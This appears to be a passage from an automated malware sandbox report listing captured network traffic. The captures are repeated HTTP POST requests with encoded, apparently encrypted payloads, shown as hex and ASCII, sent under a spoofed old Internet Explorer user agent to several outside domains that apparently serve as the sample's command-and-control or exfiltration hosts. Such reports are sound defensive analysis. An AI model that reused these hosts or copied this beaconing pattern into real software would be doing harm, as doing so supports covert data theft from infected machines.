79 39 6a 66 64 50 45 76 38 4e 2b 32 35 77 6d 71 50 4c 64 41 66 69 2b 79 53 6b 78 46 6b 2f 53 48 42 71 74 74 4f 69 5a 37 69 5a 47 74 6e 47 43 62 36 6e 58 64 79 72 5a 76 39 35 4f 35 78 58 6b 46 63 2f 4b 4f 51 70 67 31 30 4d 68 56 43 61 45 33 58 50 62 70 30 4a 52 41 57 75 77 5a 6c 70 49 46 6a 53 33 56 46 6c 2f 33 4e 5a 5a 55 41 4c 30 51 69 6f 4b 6a 4f 76 45 76 42 69 4a 6c 74 38 4a 64 5a 6c 63 63 65 71 66 37 44 57 78 4f 62 74 4d 71 51 42 48 6f 44 76 47 39 74 71 6f 73 6f 39 6b 4c 56 32 4d 63 78 4b 32 50 76 2b 54 51 65 66 34 6b 44 74 6f 70 73 6a 66 31 75 31 6a 4a 74 66 32 52 63 77 4f 73 6a 38 6e 35 4f 56 7a 4d 65 4a 65 2b 70 57 68 55 67 62 54 31 41 59 48 35 69 50 73 57 42 66 70 42 4e 58 4a 56 4e 6b 4b 67 4e 73 4e 34 2f 4a 6b 33 62 54 49 4e 32 32 41 42 78 67 35 6b 32 63 73 75 49 36 45 43 79 65 4d 4a 5a 54 4f 4a 2b 61 34 6b 56 4d 50 49 6b 7a 33 79 6b 35 74 76 69 2b 59 49 75 64 56 48 57 6e 74 6b 47 34 66 37 46 41 56 6f 4a 55 58 67 59 63 48 61 73 61 51 68 51 49 76 4f 5a 74 78 67 49 4c 30 49 57 31 74 69 63 36 46 6f 49 54 31 46 66 4a 73 43 4f 39 52 47 62 4c 31 7a 53 6b 33 43 47 63 53 70 6f 70 65 2b 4c 36 72 34 34 78 34 37 35 6e 36 30 73 63 52 54 68 54 68 65 72 34 6c 63 34 44 72 6b 73 61 68 4e 56 46 70 38 6d 47 46 69 4a 4d 2b 62 4c 51 73 4c 46 73 79 53 72 Data Ascii: 6gapCrfNu1XFcGepJk/OgQC5QM9tsFPQ21x3WzWmgDeZE0cUw9OGOa1sdqF3EYdBGdL9NHRtqepOOMryp8DXPcEozjfeuvx/whOk245qefMJcsIDmyF3s9HYKTMi4ZEb7UrcUOV1MhezoaGEf9ucc2RdWIODIBdy9jfdPEv8N+25wmqPLdAfi+ySkxFk/SHBqttOiZ7iZGtnGCb6nXdyrZv95O5xXkFc/KOQpg10MhVCaE3XPbp0JRAWuwZlpIFjS3VFl/3NZZUAL0QioKjOvEvBiJlt8JdZlcceqf7DWxObtMqQBHoDvG9tqoso9kLV2McxK2Pv+TQef4kDtopsjf1u1jJtf2RcwOsj8n5OVzMeJe+pWhUgbT1AYH5iPsWBfpBNXJVNkKgNsN4/Jk3bTIN22ABxg5k2csuI6ECyeMJZTOJ+a4kVMPIkz3yk5tvi+YIudVHWntkG4f7FAVoJUXgYcHasaQhQIvOZtxgIL0IW1tic6FoIT1FfJsCO9RGbL1zSk3CGcSpope+L6r44x475n60scRThTher4lc4DrksahNVFp8mGFiJM+bLQsLFsySr
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 572User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.pdqhomes.comCache-Control: no-cacheData Raw: 6f 5a 74 33 51 31 34 7a 59 6c 56 45 33 4b 59 61 71 51 4d 52 74 30 48 59 4b 5a 36 65 34 4d 52 42 63 70 6c 67 4f 51 6f 6c 54 5a 37 78 4a 58 4b 73 4d 73 65 67 69 70 53 6e 2f 4e 51 75 30 70 38 35 31 69 58 67 75 6c 74 37 66 46 6f 37 51 51 6f 35 65 55 37 74 6f 5a 45 43 71 30 54 36 7a 58 58 37 41 35 32 32 46 38 36 57 79 41 47 4d 78 62 51 55 44 70 79 6c 74 36 78 62 35 62 64 4d 45 4f 38 54 51 42 38 73 73 36 6d 56 61 62 69 31 5a 6d 56 53 7a 4c 56 34 34 7a 74 6d 6a 58 2f 48 31 51 6a 5a 62 37 64 4f 4b 30 77 55 54 35 44 41 37 65 4b 63 31 49 51 65 31 67 6d 49 41 75 32 6c 72 44 6b 71 31 62 49 6f 56 6d 63 4a 48 43 5a 36 71 45 74 50 57 48 53 49 65 52 62 50 6a 45 50 37 65 6d 42 78 72 62 6d 43 35 54 6f 73 32 36 72 62 45 63 53 78 6c 49 4b 71 6f 7a 72 4b 73 7a 73 4c 58 61 72 79 70 50 62 76 78 2b 75 48 52 49 2f 4a 67 70 59 4d 6c 6e 58 44 34 54 66 68 2b 47 74 75 55 41 37 32 73 54 6e 6c 41 4a 74 34 63 5a 4d 45 4d 74 6c 43 53 65 4c 56 6f 70 70 64 42 61 53 33 57 4a 68 4d 50 61 4b 6c 7a 4e 34 70 35 46 47 63 75 6b 46 59 52 31 48 7a 37 4f 70 34 43 32 76 50 72 51 2f 4b 39 4d 73 57 67 47 46 57 59 45 36 6a 42 46 35 4d 67 2f 7a 6f 61 66 51 5a 44 47 66 38 49 6e 59 61 71 7a 66 30 6a 79 2b 35 31 4c 6b 47 52 52 42 54 52 6a 6a 32 37 53 38 48 6f 6c 37 43 72 6b 72 35 47 4e 43 53 4f 49 56 4c 59 52 31 41 59 36 66 7a 6c 4b 73 47 33 38 44 34 76 41 70 4c 46 48 6c 6e 70 2b 2b 37 4b 75 6c 6c 48 45 38 5a 76 70 4e 62 31 2b 45 41 52 33 54 65 4c 75 32 55 4f 31 50 45 33 74 76 77 68 56 64 58 6f 63 6f 4d 65 7a 47 75 35 36 68 4c 78 38 50 68 6d 69 69 35 7a 77 4f 74 44 61 6c 64 61 33 4d 66 4a 75 4b 38 58 78 64 4b 34 35 35 7a 48 42 63 6d 6b 4e 47 50 44 5a 66 64 2b 34 75 2f 4e 4b 44 77 36 56 64 47 73 64 36 64 4d 6e 43 55 54 6a 6d 49 64 36 66 72 Data Ascii: oZt3Q14zYlVE3KYaqQMRt0HYKZ6e4MRBcplgOQolTZ7xJXKsMsegipSn/NQu0p851iXgult7fFo7QQo5eU7toZECq0T6zXX7A522F86WyAGMxbQUDpylt6xb5bdMEO8TQB8ss6mVabi1ZmVSzLV44ztmjX/H1QjZb7dOK0wUT5DA7eKc1IQe1gmIAu2lrDkq1bIoVmcJHCZ6qEtPWHSIeRbPjEP7emBxrbmC5Tos26rbEcSxlIKqozrKszsLXarypPbvx+uHRI/JgpYMlnXD4Tfh+GtuUA72sTnlAJt4cZMEMtlCSeLVoppdBaS3WJhMPaKlzN4p5FGcukFYR1Hz7Op4C2vPrQ/K9MsWgGFWYE6jBF5Mg/zoafQZDGf8InYaqzf0jy+51LkGRRBTRjj27S8Hol7Crkr5GNCSOIVLYR1AY6fzlKsG38D4vApLFHlnp++7KullHE8ZvpNb1+EAR3TeLu2UO1PE3tvwhVdXocoMezGu56hLx8Phmii5zwOtDalda3MfJuK8XxdK455zHBcmkNGPDZfd+4u/NKDw6VdGsd6dMnCUTjmId6fr
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 540User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.naoi-a.comCache-Control: no-cacheData Raw: 43 4f 6d 49 48 4f 48 42 71 31 55 68 51 6b 35 77 51 48 46 67 39 4c 6f 41 6d 43 2f 66 38 49 42 38 70 59 36 4e 75 51 4f 31 6d 41 78 7a 32 72 42 51 31 35 6f 4c 65 4a 70 59 68 34 61 66 4c 2b 7a 43 72 65 70 6f 62 4f 69 37 68 4b 71 78 55 66 54 53 4d 41 45 4e 4e 49 69 4c 47 68 67 50 72 46 4f 5a 34 71 69 66 5a 58 41 66 43 49 52 74 2f 4c 71 6e 4a 64 72 63 68 6c 35 33 31 48 52 34 61 7a 70 7a 52 6a 50 43 5a 76 73 71 71 59 33 38 43 66 39 73 4c 37 54 31 56 54 39 45 77 4a 59 43 4f 63 4c 71 32 30 43 42 57 4d 44 71 34 4c 35 34 39 63 54 33 6f 36 50 41 61 57 71 37 6a 37 38 69 6f 46 6e 53 39 5a 77 54 73 72 6c 50 65 42 61 62 54 69 39 52 43 50 4e 4d 64 58 55 57 7a 50 76 58 33 6c 41 35 39 49 6a 33 59 38 65 63 51 33 59 44 77 61 68 4e 5a 68 62 56 76 55 44 6c 6f 66 6c 39 46 51 35 56 50 32 37 4c 66 30 62 41 57 44 57 45 6f 31 38 5a 39 4c 65 54 2b 58 2f 52 71 63 57 6b 74 5a 69 71 64 76 70 33 41 39 44 53 35 31 46 69 69 64 69 6c 34 34 5a 71 62 78 4a 66 58 4b 65 6c 38 4b 67 53 4a 36 78 69 65 72 2f 74 65 55 2f 6f 57 5a 72 47 43 6e 2f 32 63 46 4e 63 30 44 72 46 62 73 69 79 2b 71 64 32 79 66 4e 43 4f 34 39 70 31 62 54 52 59 52 45 6a 4a 35 69 75 41 69 63 73 5a 75 59 45 4b 35 7a 53 6e 61 68 70 30 48 74 56 79 35 78 66 4c 56 31 74 42 30 52 6e 35 46 4a 4c 52 33 64 74 32 31 76 31 41 37 70 6a 37 38 37 42 63 6c 63 48 41 30 55 31 6e 38 71 52 4f 53 64 6f 51 49 2f 63 33 48 48 31 63 50 47 72 4f 78 51 51 2b 49 65 79 53 37 47 4e 59 47 47 2b 6a 58 42 59 68 56 42 38 75 41 42 68 59 59 79 79 59 64 38 58 33 38 63 75 6a 54 48 31 46 46 54 74 51 51 4a 61 58 58 34 38 4d 34 58 57 71 67 38 30 4c 64 4e 62 77 64 6a 47 54 4d 2f 32 37 41 57 4b 65 74 4d 3d Data Ascii: COmIHOHBq1UhQk5wQHFg9LoAmC/f8IB8pY6NuQO1mAxz2rBQ15oLeJpYh4afL+zCrepobOi7hKqxUfTSMAENNIiLGhgPrFOZ4qifZXAfCIRt/LqnJdrchl531HR4azpzRjPCZvsqqY38Cf9sL7T1VT9EwJYCOcLq20CBWMDq4L549cT3o6PAaWq7j78ioFnS9ZwTsrlPeBabTi9RCPNMdXUWzPvX3lA59Ij3Y8ecQ3YDwahNZhbVvUDlofl9FQ5VP27Lf0bAWDWEo18Z9LeT+X/RqcWktZiqdvp3A9DS51Fiidil44ZqbxJfXKel8KgSJ6xier/teU/oWZrGCn/2cFNc0DrFbsiy+qd2yfNCO49p1bTRYREjJ5iuAicsZuYEK5zSnahp0HtVy5xfLV1tB0Rn5FJLR3dt21v1A7pj787BclcHA0U1n8qROSdoQI/c3HH1cPGrOxQQ+IeyS7GNYGG+jXBYhVB8uABhYYyyYd8X38cujTH1FFTtQQJaXX48M4XWqg80LdNbwdjGTM/27AWKetM=
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 580User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.fcwcvt.orgCache-Control: no-cacheData Raw: 53 79 37 49 43 72 76 4f 75 31 56 42 78 51 39 49 55 76 53 5a 6d 36 54 55 66 6d 54 42 2f 34 4c 57 48 34 78 48 2b 38 35 33 30 43 44 44 64 6f 39 41 59 74 58 6c 59 78 75 37 67 2b 57 52 33 54 74 58 4a 73 48 71 50 66 72 44 6e 55 49 71 38 47 42 74 59 56 77 55 54 79 72 4c 6a 30 6e 49 73 52 69 56 6d 61 61 50 51 4a 48 34 31 37 78 78 31 59 35 7a 6d 6a 65 6a 61 59 50 59 61 5a 70 32 50 51 4f 52 45 36 56 4e 68 6e 7a 70 37 4a 37 48 6f 71 2f 68 62 57 38 73 70 56 4f 6b 61 41 74 62 37 56 31 59 62 4f 61 66 32 58 7a 6a 75 6d 4b 71 68 56 45 62 6f 4d 31 61 47 41 36 4d 67 30 49 41 4f 5a 36 51 6f 51 77 75 6f 55 73 65 58 48 66 73 47 2b 71 6b 39 6c 6a 41 6d 66 78 6e 69 6e 37 52 58 45 59 48 52 73 44 72 73 44 71 6e 6a 6d 70 43 69 38 36 4a 78 2b 4f 49 49 6d 5a 64 41 7a 49 47 67 56 6a 54 4d 4d 78 47 6c 61 5a 41 53 7a 65 49 35 62 53 33 6e 50 6a 68 70 33 5a 4d 77 48 35 68 53 6e 6e 48 61 76 4a 48 53 52 33 6f 78 38 59 71 56 32 6c 4c 6c 58 49 45 65 6f 37 35 66 57 6a 52 57 36 39 71 38 2b 76 67 7a 57 44 6d 62 6f 52 45 54 70 75 5a 44 6f 45 64 46 64 65 63 46 2b 5a 53 47 42 7a 65 54 77 2b 63 66 61 52 64 52 4a 51 41 63 51 49 66 67 44 50 69 4e 39 63 4d 64 6e 7a 33 62 69 2f 66 68 31 67 69 73 33 31 41 48 2b 77 4c 67 38 63 43 7a 72 30 2f 51 66 55 4c 6d 37 71 59 4d 4e 6d 59 6a 2b 46 4f 36 4a 50 62 71 35 4f 6c 72 46 63 59 72 32 49 2b 58 30 67 77 72 6f 4c 6b 7a 68 44 74 4d 4b 30 34 37 44 59 61 35 4b 63 69 39 4f 59 71 71 6d 66 72 75 4c 7a 65 6d 47 4f 51 2b 6b 51 69 69 58 4f 4b 69 58 6f 58 70 54 50 43 44 2b 66 4f 52 4e 6b 74 4a 47 67 71 6e 6e 71 30 53 39 30 34 71 34 4b 63 62 4a 54 61 2b 6a 78 49 38 4f 49 68 76 49 6f 66 2f 61 50 64 75 37 4d 67 6d 45 4a 79 52 47 4b 6d 37 69 64 4d 4c 54 52 45 79 57 4f 4e 54 68 75 75 58 72 57 34 70 72 39 31 52 41 66 58 57 51 3d 3d Data Ascii: Sy7ICrvOu1VBxQ9IUvSZm6TUfmTB/4LWH4xH+8530CDDdo9AYtXlYxu7g+WR3TtXJsHqPfrDnUIq8GBtYVwUTyrLj0nIsRiVmaaPQJH417xx1Y5zmjejaYPYaZp2PQORE6VNhnzp7J7Hoq/hbW8spVOkaAtb7V1YbOaf2XzjumKqhVEboM1aGA6Mg0IAOZ6QoQwuoUseXHfsG+qk9ljAmfxnin7RXEYHRsDrsDqnjmpCi86Jx+OIImZdAzIGgVjTMMxGlaZASzeI5bS3nPjhp3ZMwH5hSnnHavJHSR3ox8YqV2lLlXIEeo75fWjRW69q8+vgzWDmboRETpuZDoEdFdecF+ZSGBzeTw+cfaRdRJQAcQIfgDPiN9cMdnz3bi/fh1gis31AH+wLg8cCzr0/QfULm7qYMNmYj+FO6JPbq5OlrFcYr2I+X0gwroLkzhDtMK047DYa5Kci9OYqqmfruLzemGOQ+kQiiXOKiXoXpTPCD+fORNktJGgqnnq0S904q4KcbJTa+jxI8OIhvIof/aPdu7MgmEJyRGKm7idMLTREyWONThuuXrW4pr91RAfXWQ==
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 556User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.pwd.orgCache-Control: no-cacheData Raw: 61 6a 2b 36 44 64 68 46 50 59 37 44 2f 48 56 52 32 34 39 33 73 63 76 6d 48 4f 4b 67 5a 63 6d 53 6a 47 37 4c 49 41 78 4f 49 42 64 32 59 50 44 6f 77 6c 6d 6e 37 47 66 6b 52 39 54 76 4e 69 45 43 74 4d 63 32 50 4a 70 58 77 36 35 52 74 6e 6f 6c 55 51 7a 39 33 58 6d 74 6d 44 44 50 4b 78 46 46 52 61 6b 56 72 57 79 66 34 37 44 65 30 56 6e 75 45 48 51 4b 74 33 72 59 52 2b 4c 42 51 66 7a 36 75 6d 30 39 30 52 78 31 43 6d 65 42 43 64 64 36 6b 52 5a 4e 77 5a 4a 58 72 6d 49 33 6b 54 75 62 6a 74 53 42 76 61 53 58 75 6c 70 59 44 53 6a 55 36 71 61 58 75 57 2b 46 69 70 67 77 6e 37 50 44 45 34 59 57 48 4d 6f 63 6c 57 32 72 49 67 32 46 33 72 74 75 37 64 5a 6d 7a 4e 41 75 42 35 66 6a 70 31 6d 66 39 4d 44 30 55 76 33 33 54 73 45 62 74 36 79 6b 73 50 2f 56 59 5a 36 66 72 30 59 36 6a 53 36 33 7a 4b 58 55 79 35 4f 6f 62 62 57 64 56 44 6e 55 2f 4a 39 34 37 64 67 54 72 6c 48 4a 74 79 65 30 6f 79 67 77 73 79 38 52 78 57 6c 64 52 4b 73 74 44 67 6d 55 53 2f 43 59 62 51 7a 76 71 4a 36 42 61 46 34 4d 53 59 42 30 57 63 5a 70 37 4c 46 55 4d 75 50 6f 34 32 79 37 6c 2f 56 59 7a 73 33 57 75 33 74 4d 49 34 67 51 30 75 51 67 65 32 73 34 37 78 6a 45 4e 37 51 78 78 4b 43 44 6f 76 55 41 57 33 70 6b 43 34 51 39 41 59 4f 49 42 45 42 39 65 51 72 59 4c 58 53 59 74 78 53 59 73 63 4a 62 57 30 31 2f 55 48 41 2f 32 56 43 59 43 31 54 43 33 59 6f 70 58 45 32 38 4c 44 50 57 32 48 34 76 62 73 35 31 6a 46 55 49 54 35 4a 65 37 58 38 41 46 61 58 74 47 68 76 44 74 57 6a 77 64 74 57 67 56 6e 5a 53 30 41 41 63 70 74 77 6d 79 52 52 2f 2b 4b 4b 35 4f 71 38 49 31 4b 79 75 53 77 59 68 59 6d 62 41 30 34 72 2f 2f 39 4d 73 30 44 38 69 6e 76 50 61 48 74 55 6c 66 4c 6b 73 68 36 58 31 44 4d 51 6a 68 68 76 4a Data Ascii: aj+6DdhFPY7D/HVR2493scvmHOKgZcmSjG7LIAxOIBd2YPDowlmn7GfkR9TvNiECtMc2PJpXw65RtnolUQz93XmtmDDPKxFFRakVrWyf47De0VnuEHQKt3rYR+LBQfz6um090Rx1CmeBCdd6kRZNwZJXrmI3kTubjtSBvaSXulpYDSjU6qaXuW+Fipgwn7PDE4YWHMoclW2rIg2F3rtu7dZmzNAuB5fjp1mf9MD0Uv33TsEbt6yksP/VYZ6fr0Y6jS63zKXUy5OobbWdVDnU/J947dgTrlHJtye0oygwsy8RxWldRKstDgmUS/CYbQzvqJ6BaF4MSYB0WcZp7LFUMuPo42y7l/VYzs3Wu3tMI4gQ0uQge2s47xjEN7QxxKCDovUAW3pkC4Q9AYOIBEB9eQrYLXSYtxSYscJbW01/UHA/2VCYC1TC3YopXE28LDPW2H4vbs51jFUIT5Je7X8AFaXtGhvDtWjwdtWgVnZS0AAcptwmyRR/+KK5Oq8I1KyuSwYhYmbA04r//9Ms0D8invPaHtUlfLksh6X1DMQjhhvJ
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 548User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.medius.siCache-Control: no-cacheData Raw: 58 43 75 4f 48 65 4a 70 54 6f 34 37 4b 67 47 4d 56 56 2b 73 43 32 56 46 6b 64 35 79 41 77 56 6c 4e 70 37 41 42 4a 75 4c 43 39 4d 68 7a 56 6d 47 45 5a 79 55 4d 67 51 41 66 77 49 33 41 2b 77 4a 2f 42 75 39 75 69 71 33 78 36 41 53 57 72 47 78 43 4a 35 6f 6d 44 6f 64 37 59 50 46 45 46 5a 2b 41 6d 5a 67 6f 61 48 33 71 61 51 62 30 52 6e 4e 31 76 4d 45 38 56 4f 62 54 41 39 7a 64 47 65 78 78 71 76 74 69 6a 43 4d 61 56 4f 4b 57 52 47 58 6a 4d 72 51 39 42 4e 7a 6d 75 41 48 31 74 32 50 41 59 7a 43 72 59 47 58 64 2f 4a 4e 6e 48 61 4a 54 76 63 47 44 35 2f 63 39 75 5a 34 4d 62 75 65 47 4f 4b 38 68 48 65 32 4c 6d 76 74 4a 36 6f 49 64 6c 36 66 33 45 79 4e 66 75 46 7a 64 45 30 73 33 70 30 38 58 65 59 4d 5a 65 31 76 43 58 67 62 48 5a 67 71 33 52 53 66 61 41 64 50 4b 45 64 76 4f 6b 42 37 50 55 69 50 7a 33 34 45 37 6a 4a 62 74 50 6d 77 63 34 61 37 4f 79 43 2b 78 77 62 47 55 6d 68 78 52 41 4b 64 6e 4d 72 38 2b 44 4b 52 72 31 6c 38 4b 4a 39 51 6c 37 64 61 77 66 73 42 37 79 2b 54 69 77 67 44 76 66 2f 47 36 38 43 54 66 68 71 6c 5a 38 57 64 6e 63 50 57 58 32 54 2f 45 67 6c 72 7a 58 36 2f 6a 41 72 76 78 73 53 6e 64 57 5a 50 50 59 61 30 57 6b 46 6a 47 4b 63 4c 5a 6c 73 61 45 6e 61 37 42 43 46 31 41 6b 55 59 4a 35 6f 54 6d 78 72 66 75 37 75 74 7a 30 6f 41 6e 5a 50 2f 2b 6c 66 48 72 77 43 2b 47 66 4c 7a 63 4c 76 39 4e 32 55 45 54 48 34 69 78 42 36 73 65 41 6e 77 4e 33 6b 54 44 6c 6a 58 66 75 43 6d 7a 6f 6b 4a 6a 69 2b 32 6d 75 73 68 4b 72 79 56 58 56 32 54 4c 67 4a 6f 5a 79 68 72 55 43 61 2f 64 50 43 37 4e 62 6b 2f 38 6d 69 56 51 65 67 6d 2f 31 50 41 78 41 38 33 47 31 30 31 6b 39 31 65 78 69 4f 38 4f 38 74 70 79 6e 52 63 76 78 6c 6a 72 41 3d 3d Data Ascii: XCuOHeJpTo47KgGMVV+sC2VFkd5yAwVlNp7ABJuLC9MhzVmGEZyUMgQAfwI3A+wJ/Bu9uiq3x6ASWrGxCJ5omDod7YPFEFZ+AmZgoaH3qaQb0RnN1vME8VObTA9zdGexxqvtijCMaVOKWRGXjMrQ9BNzmuAH1t2PAYzCrYGXd/JNnHaJTvcGD5/c9uZ4MbueGOK8hHe2LmvtJ6oIdl6f3EyNfuFzdE0s3p08XeYMZe1vCXgbHZgq3RSfaAdPKEdvOkB7PUiPz34E7jJbtPmwc4a7OyC+xwbGUmhxRAKdnMr8+DKRr1l8KJ9Ql7dawfsB7y+TiwgDvf/G68CTfhqlZ8WdncPWX2T/EglrzX6/jArvxsSndWZPPYa0WkFjGKcLZlsaEna7BCF1AkUYJ5oTmxrfu7utz0oAnZP/+lfHrwC+GfLzcLv9N2UETH4ixB6seAnwN3kTDljXfuCmzokJji+2mushKryVXV2TLgJoZyhrUCa/dPC7Nbk/8miVQegm/1PAxA83G101k91exiO8O8tpynRcvxljrA==
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 572User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.aevga.comCache-Control: no-cacheData Raw: 58 33 78 36 68 50 42 69 30 46 56 76 6a 62 30 4d 41 35 6e 66 53 4b 4f 37 37 77 57 59 68 47 4d 75 4a 45 6d 33 67 76 32 39 53 4f 4b 54 52 51 44 73 59 6e 38 74 6b 55 6b 4a 62 33 35 71 44 73 6b 4c 4b 49 46 45 53 64 58 52 71 65 76 2f 74 48 53 58 58 51 4c 45 35 42 6f 69 68 4c 4a 71 2b 36 76 6a 46 58 70 4b 4a 62 70 70 35 37 46 72 50 30 58 6d 35 69 64 31 67 51 55 4b 44 74 70 70 49 6b 59 62 63 56 64 58 61 39 68 7a 4c 53 4a 6f 61 6a 72 2b 6b 74 73 59 79 74 53 46 36 51 76 4a 79 6e 2b 76 63 2f 43 4d 37 67 59 47 6e 72 5a 44 56 70 78 59 45 4e 68 4a 76 35 53 4c 48 79 56 55 63 35 66 58 4f 6d 62 68 73 31 53 70 65 54 46 71 42 58 55 2f 54 5a 4a 36 65 69 43 35 41 70 4e 66 6e 62 66 7a 64 77 6e 72 6c 62 52 64 4b 73 53 77 71 4d 37 70 55 39 46 6c 4f 2b 74 54 74 4e 72 74 61 56 58 71 45 5a 4a 73 50 54 53 50 47 2b 77 33 6c 49 51 2f 30 53 6d 59 36 31 4b 4a 59 4f 72 52 4c 6e 72 6e 49 61 6d 4d 76 46 57 6c 44 4c 6f 7a 65 4f 50 49 4e 2b 54 79 62 45 34 37 6b 43 50 2f 56 62 6e 62 47 38 6a 6a 6d 30 72 4e 6e 57 44 35 69 54 43 4b 36 77 5a 2b 4f 4c 49 65 35 5a 6f 37 66 68 64 4f 66 6c 58 6c 50 47 31 32 50 7a 53 54 6a 49 4f 64 62 55 4d 56 2b 41 6b 39 70 70 71 69 63 35 45 53 4b 6b 65 5a 33 4c 57 65 37 4b 70 58 4d 68 63 6b 4d 65 72 4e 51 38 55 37 62 44 43 75 5a 57 36 30 58 5a 70 6f 47 55 69 63 34 6a 7a 66 31 73 41 38 34 76 62 2b 71 4e 55 61 36 43 57 72 31 2b 4e 51 4c 48 4b 44 4e 49 33 42 39 63 4c 55 65 67 65 51 4e 32 6e 49 71 31 54 42 48 39 67 6c 6d 63 70 39 6d 34 63 4f 30 2b 4d 43 6d 69 59 4b 5a 57 4c 6f 56 41 55 54 53 48 73 65 50 6a 6c 62 31 7a 2f 5a 69 74 55 4e 6d 45 6b 76 6c 51 61 32 30 30 69 74 49 74 2f 35 41 37 59 46 50 47 5a 39 47 54 4b 64 71 45 70 4d 2b 50 7a 48 32 7a 35 67 32 75 4a 79 34 54 62 51 76 44 74 2b 54 72 45 3d Data Ascii: X3x6hPBi0FVvjb0MA5nfSKO77wWYhGMuJEm3gv29SOKTRQDsYn8tkUkJb35qDskLKIFESdXRqev/tHSXXQLE5BoihLJq+6vjFXpKJbpp57FrP0Xm5id1gQUKDtppIkYbcVdXa9hzLSJoajr+ktsYytSF6QvJyn+vc/CM7gYGnrZDVpxYENhJv5SLHyVUc5fXOmbhs1SpeTFqBXU/TZJ6eiC5ApNfnbfzdwnrlbRdKsSwqM7pU9FlO+tTtNrtaVXqEZJsPTSPG+w3lIQ/0SmY61KJYOrRLnrnIamMvFWlDLozeOPIN+TybE47kCP/VbnbG8jjm0rNnWD5iTCK6wZ+OLIe5Zo7fhdOflXlPG12PzSTjIOdbUMV+Ak9ppqic5ESKkeZ3LWe7KpXMhckMerNQ8U7bDCuZW60XZpoGUic4jzf1sA84vb+qNUa6CWr1+NQLHKDNI3B9cLUegeQN2nIq1TBH9glmcp9m4cO0+MCmiYKZWLoVAUTSHsePjlb1z/ZitUNmEkvlQa200itIt/5A7YFPGZ9GTKdqEpM+PzH2z5g2uJy4TbQvDt+TrE=
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 548User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.medius.siCache-Control: no-cacheData Raw: 58 43 75 4f 48 65 4a 70 54 6f 34 37 4b 67 47 4d 56 56 2b 73 43 32 56 46 6b 64 35 79 41 77 56 6c 4e 70 37 41 42 4a 75 4c 43 39 4d 68 7a 56 6d 47 45 5a 79 55 4d 67 51 41 66 77 49 33 41 2b 77 4a 2f 42 75 39 75 69 71 33 78 36 41 53 57 72 47 78 43 4a 35 6f 6d 44 6f 64 37 59 50 46 45 46 5a 2b 41 6d 5a 67 6f 61 48 33 71 61 51 62 30 52 6e 4e 31 76 4d 45 38 56 4f 62 54 41 39 7a 64 47 65 78 78 71 76 74 69 6a 43 4d 61 56 4f 4b 57 52 47 58 6a 4d 72 51 39 42 4e 7a 6d 75 41 48 31 74 32 50 41 59 7a 43 72 59 47 58 64 2f 4a 4e 6e 48 61 4a 54 76 63 47 44 35 2f 63 39 75 5a 34 4d 62 75 65 47 4f 4b 38 68 48 65 32 4c 6d 76 74 4a 36 6f 49 64 6c 36 66 33 45 79 4e 66 75 46 7a 64 45 30 73 33 70 30 38 58 65 59 4d 5a 65 31 76 43 58 67 62 48 5a 67 71 33 52 53 66 61 41 64 50 4b 45 64 76 4f 6b 42 37 50 55 69 50 7a 33 34 45 37 6a 4a 62 74 50 6d 77 63 34 61 37 4f 79 43 2b 78 77 62 47 55 6d 68 78 52 41 4b 64 6e 4d 72 38 2b 44 4b 52 72 31 6c 38 4b 4a 39 51 6c 37 64 61 77 66 73 42 37 79 2b 54 69 77 67 44 76 66 2f 47 36 38 43 54 66 68 71 6c 5a 38 57 64 6e 63 50 57 58 32 54 2f 45 67 6c 72 7a 58 36 2f 6a 41 72 76 78 73 53 6e 64 57 5a 50 50 59 61 30 57 6b 46 6a 47 4b 63 4c 5a 6c 73 61 45 6e 61 37 42 43 46 31 41 6b 55 59 4a 35 6f 54 6d 78 72 66 75 37 75 74 7a 30 6f 41 6e 5a 50 2f 2b 6c 66 48 72 77 43 2b 47 66 4c 7a 63 4c 76 39 4e 32 55 45 54 48 34 69 78 42 36 73 65 41 6e 77 4e 33 6b 54 44 6c 6a 58 66 75 43 6d 7a 6f 6b 4a 6a 69 2b 32 6d 75 73 68 4b 72 79 56 58 56 32 54 4c 67 4a 6f 5a 79 68 72 55 43 61 2f 64 50 43 37 4e 62 6b 2f 38 6d 69 56 51 65 67 6d 2f 31 50 41 78 41 38 33 47 31 30 31 6b 39 31 65 78 69 4f 38 4f 38 74 70 79 6e 52 63 76 78 6c 6a 72 41 3d 3d Data Ascii: 